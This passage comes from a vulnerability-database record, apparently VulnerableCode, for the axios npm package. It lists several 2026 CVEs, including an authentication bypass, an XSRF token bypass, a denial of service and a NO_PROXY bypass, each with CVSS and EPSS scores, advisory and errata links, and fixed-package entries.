url https://access.redhat.com/errata/RHSA-2026:16534
13
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
14
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
15
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
16
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
17
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
18
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
19
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
20
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
21
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
22
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
23
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
24
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
25
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
26
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
27
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
28
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
29
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
30
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42035, GHSA-6chq-wfr3-2hj9
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vzqt-dj1z-bqa6
16
url VCID-xdas-dhtb-nuge
vulnerability_id VCID-xdas-dhtb-nuge
summary axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42041
reference_id
reference_type
scores
0
value 0.00202
scoring_system epss
scoring_elements 0.42207
published_at 2026-06-07T12:55:00Z
1
value 0.00202
scoring_system epss
scoring_elements 0.42224
published_at 2026-06-05T12:55:00Z
2
value 0.00202
scoring_system epss
scoring_elements 0.42235
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42041
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:29:47Z/
url https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42041
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42041
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461629
reference_id 2461629
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461629
9
reference_url https://github.com/advisories/GHSA-w9j2-pvgh-6h63
reference_id GHSA-w9j2-pvgh-6h63
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w9j2-pvgh-6h63
10
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
11
reference_url https://access.redhat.com/errata/RHSA-2026:16476
reference_id RHSA-2026:16476
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16476
12
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
13
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16534
14
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
15
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
16
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
17
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
18
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
19
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
20
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
21
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
22
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
23
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
24
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
25
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
26
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
27
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
28
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
29
reference_url https://access.redhat.com/errata/RHSA-2026:22619
reference_id RHSA-2026:22619
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22619
30
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
31
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
32
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42041, GHSA-w9j2-pvgh-6h63
risk_score 3.7
exploitability 0.5
weighted_severity 7.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xdas-dhtb-nuge
17
url VCID-xg1x-4spz-jucn
vulnerability_id VCID-xg1x-4spz-jucn
summary axios: Axios: XSRF token bypass leading to information disclosure
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42042
reference_id
reference_type
scores
0
value 0.00065
scoring_system epss
scoring_elements 0.20367
published_at 2026-06-07T12:55:00Z
1
value 0.00065
scoring_system epss
scoring_elements 0.20417
published_at 2026-06-05T12:55:00Z
2
value 0.00065
scoring_system epss
scoring_elements 0.20406
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42042
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:35:32Z/
url https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42042
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42042
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461637
reference_id 2461637
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461637
8
reference_url https://github.com/advisories/GHSA-xx6v-rp6x-q39c
reference_id GHSA-xx6v-rp6x-q39c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xx6v-rp6x-q39c
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42042, GHSA-xx6v-rp6x-q39c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xg1x-4spz-jucn
18
url VCID-yu5y-e4bk-zyfp
vulnerability_id VCID-yu5y-e4bk-zyfp
summary axios: Axios: Denial of Service via oversized streamed uploads bypassing body limits
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42034
reference_id
reference_type
scores
0
value 0.00096
scoring_system epss
scoring_elements 0.26542
published_at 2026-06-07T12:55:00Z
1
value 0.00096
scoring_system epss
scoring_elements 0.26593
published_at 2026-06-05T12:55:00Z
2
value 0.00096
scoring_system epss
scoring_elements 0.26583
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42034
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:12:43Z/
url https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42034
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42034
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461623
reference_id 2461623
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461623
8
reference_url https://github.com/advisories/GHSA-5c9x-8gcm-mpgx
reference_id GHSA-5c9x-8gcm-mpgx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5c9x-8gcm-mpgx
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42034, GHSA-5c9x-8gcm-mpgx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yu5y-e4bk-zyfp
19
url VCID-z5pf-pqcd-ckas
vulnerability_id VCID-z5pf-pqcd-ckas
summary axios: Axios: NO_PROXY bypass via crafted URL
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42043
reference_id
reference_type
scores
0
value 0.00026
scoring_system epss
scoring_elements 0.0794
published_at 2026-06-07T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07951
published_at 2026-06-05T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.07966
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42043
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:47:20Z/
url https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42043
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42043
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461626
reference_id 2461626
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461626
9
reference_url https://github.com/advisories/GHSA-pmwg-cvhr-8vh7
reference_id GHSA-pmwg-cvhr-8vh7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pmwg-cvhr-8vh7
10
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
11
reference_url https://access.redhat.com/errata/RHSA-2026:16476
reference_id RHSA-2026:16476
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16476
12
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
13
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16534
14
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
15
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
16
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
17
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
18
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
19
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
20
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
21
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
22
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
23
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
24
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
25
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
26
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
27
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
28
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
29
reference_url https://access.redhat.com/errata/RHSA-2026:22619
reference_id RHSA-2026:22619
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22619
30
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
31
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
32
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42043, GHSA-pmwg-cvhr-8vh7
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z5pf-pqcd-ckas
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.0